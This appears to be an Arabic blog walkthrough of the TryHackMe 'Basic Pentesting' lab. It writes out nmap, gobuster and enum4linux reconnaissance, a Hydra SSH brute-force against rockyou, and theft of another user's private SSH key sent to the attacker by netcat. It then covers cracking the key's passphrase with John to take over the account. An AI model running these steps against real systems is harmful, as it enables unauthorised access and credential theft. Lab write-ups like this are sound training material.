Search 🔎🖥️

TryHackMe|BasicPentesting WriteUp\Walkthrough (Arabic)

بسم الله

اللي يبغى يشوف الحل مشروح فيديو يرجع للفيديو على قناتي باليوتيوب على هذا الرابط:

 


رابط التحدي: https://tryhackme.com/r/room/basicpentestingjt

====================================================

كلمة IP في كل الكوماندز اللي أكتبها تُستبدل بالـIP للمشين حقتكم على TryHackMe

أول حاجة نشغل الـmachine ونتأكد إننا اتصلنا بشبكة TryHackMe والاتصال مضبوط، بعدين نبدأ بأول خطوة للحل وهي إننا نسوي scan للشبكة باستخدام nmap

sudo nmap IP -vv

طلع معانا 6 بورتات، نرجع نسوي Aggressive سكان على نفس هذه البورتات

sudo nmap IP -vv -A -p 22,80,139,445,8009,8080

بورت 22 عليها SSH، وعرفنا من خلال الـversion إن نظام التشغيل هو ubuntu، بورت 80 و 8009 و 8080 كلها عليها web servers. 

إذا زرنا بورت 80 على المتصفح مكتوب رسالة under going maintenance وفي الـsource code عندنا ملاحظة 

يقول شيك على dev notes، لكن وينها هذه الملاحظات؟؟، فممكن يكون في مسارات موجودة غير المسار الرئيسي، وعشان نعرف بنسوي directory enumeration  باستخدام gobuster

gobuster dir -w /usr/share/dirb/wordlists/common.txt -u htttp://IP/ -t 64

طلع معانا المسار development 

نروح له في المتصفح، وبنلاقي ملفين نصية، الملف dev.txt فيه محادثة بين J و K، معناته احتمال كبير يكون عندي مستخدمين على النظام، واحد اسمه يبدأ بـ J والثاني بـ K. 

في الملف الثاني j.txt الرسالة قادمة من K ويقول فيها لـJ إنه قدر يعرف كلمة السر له، ولازم يغيرها بأسرع وقت. 

معناته إننا نقدر نسوي crack لكلمة السر لـJ، لكن المشكلة إن احنا ما نعرف اسمه كامل، فقط أول حرف، لكن بما إن جهاز الضحية شغال عليه smb، معناته أقدر أستخدم enumrlinux عشان أسوي سكان على الجهاز ونعرف أسماء المستخدمين، فبنشغل هذه الكوماند

enum4linux -a IP

بعد ما تنتهي بيطلع معانا أسماء المستخدمين وهم Kay و Jan

فالحين ناخذ jan ونسوي عليه bruteforce باستخدام hydra

 hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://IP  -t 64

وبنحصل على كلمة السر، ثم نستخدمها عشان نسجل دخول على النظام باستخدام ssh
ssh jan@IP 
نروح للـhome ثم لـjan
cd /home/jan
ls 
وما في شيء مهم، 
نروح لـkay

cd ..
cd kay
ls -a

لقينا عندنا مجلد ssh واللي هو المجلد اللي يتم فيه حفظ مفاتيح ssh، ودائما يكون مخفي، لما ندخل عليه بنلاقي مفاتيح المستخدم kay موجودة وبإمكانا قرائتها

فبناخذ الـprivate key واللي اسمه id_rsa ونسجل دخول على النظام باستخدامه، فيصير ندخل كالمستخدم kay. أول شيء ننقل الملف على نظامنا، بأستخدم netcat

في ncat الـlistener هو اللي يستقبل والـClient هو اللي يرسل، ولازم نشغل الـlistener قبل الـclient

على جهازنا 

nc -nlvp 1233 > id_rsa

على الضحية

nc -nv OpenVPN-IP 1233 < id_rsa

لما يجينا الملف على جهازنا ونفتح بنلاحظ إنه مشفر، وعشان نفك التشفير نستخدم john

ssh2john id_rsa > hash

john hash

وبنحصل على كلمة السر اللي تخلينا نقدر نستخدمه ونتصل بالضحية، باقي خطوة وحده عشان نقدر نستخدمه بنجاح واللي هي إننا نغير صلاحيات الملف

chmod 400 id_rsa

ثم نتصل بالضحية

ssh kay@IP -i id_rsa 

ثم بيطلب كلمة السر، نعطيه كلمة السر اللي تو حصلنا عليها، وبكذا نكون دخلنا على حساب kay

ثم نعرض الملف pass.bak وبكذا يكون حصلنا على الفلاق✨ وانتهينا من الحل. 

وهنا إجابات الأسئلة باستنثاء كلمات السر والفلاق:

Comments

Popular posts from this blog

TryHackMe|Blog WriteUp\Walkthrough (Arabic)

eJPTv2 Exam Review (Arabic)

TryHackMe|Blueprint WriteUp\Walkthrough (Arabic)